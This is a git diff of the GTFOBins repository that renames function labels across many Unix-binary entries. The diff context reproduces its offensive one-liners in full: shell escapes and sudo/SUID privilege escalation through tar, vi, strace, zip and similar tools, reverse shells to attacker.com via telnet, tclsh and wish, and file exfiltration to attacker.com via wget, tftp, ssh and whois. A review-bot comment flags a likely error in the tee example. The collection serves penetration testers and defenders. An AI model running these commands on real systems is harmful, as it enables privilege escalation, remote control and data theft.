@@ -1,6 +1,6 @@ --- functions: - execute-interactive: + shell: - code: sqlite3 /dev/null '.shell /bin/sh' file-write: - code: |
@@ -14,8 +14,8 @@ functions: .import $LFILE t SELECT * FROM t; EOF - sudo-enabled: + sudo: - code: sudo sqlite3 /dev/null '.shell /bin/sh' - suid-limited: + limited-suid: - code: "./sqlite3 /dev/null '.shell /bin/sh'" ---
diff --git a/_gtfobins/ssh.md b/_gtfobins/ssh.md
index 72a718e..cc689e2 100644
--- a/_gtfobins/ssh.md
+++ b/_gtfobins/ssh.md
@@ -1,18 +1,18 @@ --- functions: - execute-interactive: + shell: - description: Reconnecting may help bypassing restricted shells. code: ssh localhost $SHELL --noprofile --norc - description: Spawn interactive shell through ProxyCommand option. code: ssh -o ProxyCommand=';sh 0<&2 1>&2' x - upload: + file-upload: - description: Send local file to a SSH server. code: | HOST=user@attacker.com RPATH=file_to_save LPATH=file_to_send ssh $HOST "cat > $RPATH" < $LPATH - download: + file-download: - description: Fetch a remote file from a SSH server. code: | HOST=user@attacker.com
@@ -24,7 +24,7 @@ functions: code: | LFILE=file_to_read ssh -F $LFILE localhost - sudo-enabled: + sudo: - description: Spawn interactive root shell through ProxyCommand option. code: sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x ---
diff --git a/_gtfobins/stdbuf.md b/_gtfobins/stdbuf.md
index 24977b8..c3b7c6e 100644
--- a/_gtfobins/stdbuf.md
+++ b/_gtfobins/stdbuf.md
@@ -1,9 +1,9 @@ --- functions: - execute-interactive: + shell: - code: stdbuf -i0 /bin/sh - suid-enabled: + suid: - code: ./stdbuf -i0 /bin/sh -p - sudo-enabled: + sudo: - code: sudo stdbuf -i0 /bin/sh ---
diff --git a/_gtfobins/strace.md b/_gtfobins/strace.md
index 18cfdb0..81c6f49 100644
--- a/_gtfobins/strace.md
+++ b/_gtfobins/strace.md
@@ -1,9 +1,9 @@ --- functions: - execute-interactive: + shell: - code: strace -o /dev/null /bin/sh - suid-enabled: + suid: - code: ./strace -o /dev/null /bin/sh -p - sudo-enabled: + sudo: - code: sudo strace -o /dev/null /bin/sh ---
diff --git a/_gtfobins/tail.md b/_gtfobins/tail.md
index 0235e3a..7ff0f76 100644
--- a/_gtfobins/tail.md
+++ b/_gtfobins/tail.md
@@ -4,11 +4,11 @@ functions: - code: | LFILE=file_to_read tail -c1G "$LFILE" - suid-enabled: + suid: - code: | LFILE=file_to_read ./tail -c1G "$LFILE" - sudo-enabled: + sudo: - code: | LFILE=file_to_read sudo tail -c1G "$LFILE"
diff --git a/_gtfobins/tar.md b/_gtfobins/tar.md
index 1cf26dd..43e701a 100644
--- a/_gtfobins/tar.md
+++ b/_gtfobins/tar.md
@@ -1,8 +1,8 @@ --- functions: - execute-interactive: + shell: - code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh - execute-non-interactive: + command: - description: This only works for GNU tar. code: tar xf /dev/null -I '/bin/sh -c "id 1>&2"' file-write:
@@ -17,8 +17,8 @@ functions: code: | LFILE=file_to_read tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"' - sudo-enabled: + sudo: - code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh - suid-limited: + limited-suid: - code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh ---
diff --git a/_gtfobins/taskset.md b/_gtfobins/taskset.md
index 4f3d474..b1fe484 100644
--- a/_gtfobins/taskset.md
+++ b/_gtfobins/taskset.md
@@ -1,9 +1,9 @@ --- functions: - execute-interactive: + shell: - code: taskset 1 /bin/sh - suid-enabled: + suid: - code: ./taskset 1 /bin/sh -p - sudo-enabled: + sudo: - code: sudo taskset 1 /bin/sh ---
diff --git a/_gtfobins/tclsh.md b/_gtfobins/tclsh.md
index db81e7f..6db0c67 100644
--- a/_gtfobins/tclsh.md
+++ b/_gtfobins/tclsh.md
@@ -1,20 +1,20 @@ --- functions: - execute-interactive: + shell: - code: | tclsh exec /bin/sh <@stdin >@stdout 2>@stderr - reverse-shell-non-interactive: + non-interactive-reverse-shell: - description: Run `nc -l -p 12345` on the attacker box to receive the shell. code: | export RHOST=attacker.com export RPORT=12345 echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh - suid-enabled: + suid: - code: | ./tclsh exec /bin/sh -p <@stdin >@stdout 2>@stderr - sudo-enabled: + sudo: - code: | sudo tclsh exec /bin/sh <@stdin >@stdout 2>@stderr
diff --git a/_gtfobins/tcpdump.md b/_gtfobins/tcpdump.md
index 3048056..2b9cd53 100644
--- a/_gtfobins/tcpdump.md
+++ b/_gtfobins/tcpdump.md
@@ -1,14 +1,14 @@ --- description: These require some traffic to be actually captured. Also note that the subprocess is immediately sent to the background. functions: - execute-non-interactive: + command: - code: | COMMAND='id' TF=$(mktemp) echo "$COMMAND" > $TF chmod +x $TF tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF - sudo-enabled: + sudo: - code: | COMMAND='id' TF=$(mktemp)
diff --git a/_gtfobins/tee.md b/_gtfobins/tee.md
index cee23f4..cec5767 100644
--- a/_gtfobins/tee.md
+++ b/_gtfobins/tee.md
@@ -5,11 +5,11 @@ functions: - code: | LFILE=file_to_write echo DATA | ./tee -a "$LFILE" - suid-enabled: + suid: - code: | LFILE=file_to_write echo DATA | ./tee -a "$LFILE" - sudo-enabled: + sudo: - code: | LFILE=file_to_write echo DATA | sudo tee -a "$LFILE"
diff --git a/_gtfobins/telnet.md b/_gtfobins/telnet.md
index b0065a0..36055c4 100644
--- a/_gtfobins/telnet.md
+++ b/_gtfobins/telnet.md
@@ -1,6 +1,6 @@ --- functions: - execute-interactive: + shell: - description: BSD version only. Needs to be connected first. code: | RHOST=attacker.com
@@ -8,14 +8,14 @@ functions: telnet $RHOST $RPORT ^] !/bin/sh - reverse-shell-interactive: + reverse-shell: - description: Run `nc -l -p 12345` on the attacker box to receive the shell. code: | RHOST=attacker.com RPORT=12345 TF=$(mktemp -u) mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF - sudo-enabled: + sudo: - description: BSD version only. Needs to be connected first. code: | RHOST=attacker.com
@@ -23,7 +23,7 @@ functions: sudo telnet $RHOST $RPORT ^] !/bin/sh - suid-limited: + limited-suid: - description: BSD version only. Needs to be connected first. code: | RHOST=attacker.com
diff --git a/_gtfobins/tftp.md b/_gtfobins/tftp.md
index d47af31..1186c87 100644
--- a/_gtfobins/tftp.md
+++ b/_gtfobins/tftp.md
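Review bot: In the tee.md hunk the entry directly above the renamed `suid` key already runs `echo DATA | ./tee -a "$LFILE"`, which is byte-for-byte the command of the `suid` entry below it; presumably this is the unprivileged `file-write` example and should invoke the binary from `PATH` as `echo DATA | tee -a "$LFILE"`, the way the `sudo` entry uses plain `tee`. The enclosing entry's key is outside the hunk, so the intended function cannot be confirmed from here; if it is indeed the plain variant the `./` prefix makes the example fail unless run from the directory holding the binary.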
@@ -1,24 +1,24 @@ --- functions: - upload: + file-upload: - description: Send local file to a TFTP server. code: | RHOST=attacker.com tftp $RHOST put file_to_send - download: + file-download: - description: Fetch a remote file from a TFTP server. code: | RHOST=attacker.com tftp $RHOST get file_to_get - suid-enabled: + suid: - description: Send local file to a TFTP server. code: | RHOST=attacker.com ./tftp $RHOST put file_to_send - sudo-enabled: + sudo: - description: Send local file to a TFTP server. code: | RHOST=attacker.com
diff --git a/_gtfobins/time.md b/_gtfobins/time.md
index 2434124..302b20b 100644
--- a/_gtfobins/time.md
+++ b/_gtfobins/time.md
@@ -1,10 +1,10 @@ --- description: Note that the shell might have its own builtin time implementation, which may behave differently than` /usr/bin/time`, hence the absolute path. functions: - execute-interactive: + shell: - code: /usr/bin/time /bin/sh - suid-enabled: + suid: - code: ./time /bin/sh -p - sudo-enabled: + sudo: - code: sudo /usr/bin/time /bin/sh ---
diff --git a/_gtfobins/timeout.md b/_gtfobins/timeout.md
index 565e594..690eed4 100644
--- a/_gtfobins/timeout.md
+++ b/_gtfobins/timeout.md
@@ -1,9 +1,9 @@ --- functions: - execute-interactive: + shell: - code: timeout 7d /bin/sh - suid-enabled: + suid: - code: ./timeout 7d /bin/sh -p - sudo-enabled: + sudo: - code: sudo timeout --foreground 7d /bin/sh ---
diff --git a/_gtfobins/ul.md b/_gtfobins/ul.md
index 06462f9..7f36306 100644
--- a/_gtfobins/ul.md
+++ b/_gtfobins/ul.md
@@ -5,11 +5,11 @@ functions: - code: | LFILE=file_to_read ul "$LFILE" - suid-enabled: + suid: - code: | LFILE=file_to_read ./ul "$LFILE" - sudo-enabled: + sudo: - code: | LFILE=file_to_read sudo ul "$LFILE"
diff --git a/_gtfobins/unexpand.md b/_gtfobins/unexpand.md
index 67efcb3..c538795 100644
--- a/_gtfobins/unexpand.md
+++ b/_gtfobins/unexpand.md
@@ -4,11 +4,11 @@ functions: - code: | LFILE=file_to_read unexpand -t99999999 "$LFILE" - suid-enabled: + suid: - code: | LFILE=file_to_read ./unexpand -t99999999 "$LFILE" - sudo-enabled: + sudo: - code: | LFILE=file_to_read sudo unexpand -t99999999 "$LFILE" diff --git a/_gtfobins/uniq.md b/_gtfobins/uniq.md index 04cfdc5..f3f102f 100644 --- a/_gtfobins/uniq.md +++ b/_gtfobins/uniq.md @@ -5,11 +5,11 @@ functions: - code: | LFILE=file_to_read uniq "$LFILE" - suid-enabled: + suid: - code: | LFILE=file_to_read ./uniq "$LFILE" - sudo-enabled: + sudo: - code: | LFILE=file_to_read sudo uniq "$LFILE" diff --git a/_gtfobins/unshare.md b/_gtfobins/unshare.md index e0396bb..86247de 100644 --- a/_gtfobins/unshare.md +++ b/_gtfobins/unshare.md @@ -1,9 +1,9 @@ --- functions: - execute-interactive: + shell: - code: unshare /bin/sh - suid-enabled: + suid: - code: ./unshare -r /bin/sh - sudo-enabled: + sudo: - code: sudo unshare /bin/sh --- diff --git a/_gtfobins/vi.md b/_gtfobins/vi.md index 32842f6..a032968 100644 --- a/_gtfobins/vi.md +++ b/_gtfobins/vi.md @@ -1,6 +1,6 @@ --- functions: - execute-interactive: + shell: - code: vi -c ':!/bin/sh' - code: | vi @@ -14,8 +14,8 @@ functions: w file-read: - code: vi file_to_read - suid-enabled: + suid: - code: ./vi -c ':!/bin/sh -p' - sudo-enabled: + sudo: - code: sudo vi -c ':!/bin/sh' --- diff --git a/_gtfobins/vim.md b/_gtfobins/vim.md index c2328e0..23b6a63 100644 --- a/_gtfobins/vim.md +++ b/_gtfobins/vim.md @@ -1,6 +1,6 @@ --- functions: - execute-interactive: + shell: - code: vim -c ':!/bin/sh' - code: | vim @@ -14,8 +14,8 @@ functions: w file-read: - code: vim file_to_read - suid-enabled: + suid: - code: ./vim -c ':!/bin/sh -p' - sudo-enabled: + sudo: - code: sudo vim -c ':!/bin/sh' --- diff --git a/_gtfobins/watch.md b/_gtfobins/watch.md index d6bdc8e..8152181 100644 --- a/_gtfobins/watch.md +++ b/_gtfobins/watch.md 
@@ -1,12 +1,12 @@ --- functions: - execute-interactive: + shell: - code: watch -x sh -c 'reset; exec sh 1>&0 2>&0' - suid-enabled: + suid: - description: This keeps the SUID privileges only if the `-x` option is present. code: ./watch -x sh -c 'reset; exec sh 1>&0 2>&0' - sudo-enabled: + sudo: - code: sudo watch -x sh -c 'reset; exec sh 1>&0 2>&0' - suid-limited: + limited-suid: - code: ./watch 'reset; exec sh 1>&0 2>&0' --- diff --git a/_gtfobins/wget.md b/_gtfobins/wget.md index e50d330..b15644a 100644 --- a/_gtfobins/wget.md +++ b/_gtfobins/wget.md @@ -1,24 +1,24 @@ --- functions: - upload: + file-upload: - description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Use `--post-data` to send hard-coded data. code: | export URL=http://attacker.com/ export LFILE=file_to_send wget --post-file=$LFILE $URL - download: + file-download: - description: Fetch a remote file via HTTP GET request. code: | export URL=http://attacker.com/file_to_get export LFILE=file_to_save wget $URL -O $LFILE - suid-enabled: + suid: - description: Fetch a remote file via HTTP GET request. code: | export URL=http://attacker.com/file_to_get export LFILE=file_to_save ./wget $URL -O $LFILE - sudo-enabled: + sudo: - description: Fetch a remote file via HTTP GET request. code: | export URL=http://attacker.com/file_to_get diff --git a/_gtfobins/whois.md b/_gtfobins/whois.md index f0e0d21..f46e652 100644 --- a/_gtfobins/whois.md +++ b/_gtfobins/whois.md @@ -2,7 +2,7 @@ description: | `whois` hangs waiting for the remote peer to close the socket. functions: - upload: + file-upload: - description: Send a text file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'` and its length is limited by the maximum size of arguments. code: | RHOST=attacker.com 
@@ -15,7 +15,7 @@ functions: RPORT=12345 LFILE=file_to_send whois -h $RHOST -p $RPORT "`base64 $LFILE`" - download: + file-download: - description: Fetch remote text file from a remote TCP port. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file. The file has instances of `$'\x0d'` stripped. code: | RHOST=attacker.com diff --git a/_gtfobins/wish.md b/_gtfobins/wish.md index 47fdba1..173ef45 100644 --- a/_gtfobins/wish.md +++ b/_gtfobins/wish.md @@ -1,16 +1,16 @@ --- functions: - execute-interactive: + shell: - code: | wish exec /bin/sh <@stdin >@stdout 2>@stderr - reverse-shell-non-interactive: + non-interactive-reverse-shell: - description: Run `nc -l -p 12345` on the attacker box to receive the shell. code: | export RHOST=attacker.com export RPORT=12345 echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | wish - sudo-enabled: + sudo: - code: | sudo wish exec /bin/sh <@stdin >@stdout 2>@stderr diff --git a/_gtfobins/xargs.md b/_gtfobins/xargs.md index 0cfd581..e50b1cb 100644 --- a/_gtfobins/xargs.md +++ b/_gtfobins/xargs.md @@ -1,6 +1,6 @@ --- functions: - execute-interactive: + shell: - description: GNU version only. code: xargs -a /dev/null sh - code: echo x | xargs -Iy sh -c 'exec sh 0<&1' @@ -13,10 +13,10 @@ functions: code: | LFILE=file_to_read xargs -a "$LFILE" -0 - suid-enabled: + suid: - description: GNU version only. code: ./xargs -a /dev/null sh -p - sudo-enabled: + sudo: - description: GNU version only. code: sudo xargs -a /dev/null sh --- diff --git a/_gtfobins/xxd.md b/_gtfobins/xxd.md index 3ef9d4a..613bc0c 100644 --- a/_gtfobins/xxd.md +++ b/_gtfobins/xxd.md 
@@ -8,11 +8,11 @@ functions: - code: | LFILE=file_to_read xxd "$LFILE" | xxd -r - suid-enabled: + suid: - code: | LFILE=file_to_read ./xxd "$LFILE" | xxd -r - sudo-enabled: + sudo: - code: | LFILE=file_to_read sudo xxd "$LFILE" | xxd -r diff --git a/_gtfobins/zip.md b/_gtfobins/zip.md index 758c11b..dd0b23e 100644 --- a/_gtfobins/zip.md +++ b/_gtfobins/zip.md @@ -1,16 +1,16 @@ --- functions: - execute-interactive: + shell: - code: | TF=$(mktemp -u) zip $TF /etc/hosts -T -TT 'sh #' rm $TF - sudo-enabled: + sudo: - code: | TF=$(mktemp -u) sudo zip $TF /etc/hosts -T -TT 'sh #' sudo rm $TF - suid-limited: + limited-suid: - code: | TF=$(mktemp -u) ./zip $TF /etc/hosts -T -TT 'sh #' diff --git a/_gtfobins/zsh.md b/_gtfobins/zsh.md index 59dbcb0..fad95bb 100644 --- a/_gtfobins/zsh.md +++ b/_gtfobins/zsh.md @@ -1,9 +1,9 @@ --- functions: - execute-interactive: + shell: - code: zsh - suid-enabled: + suid: - code: ./zsh - sudo-enabled: + sudo: - code: sudo zsh ---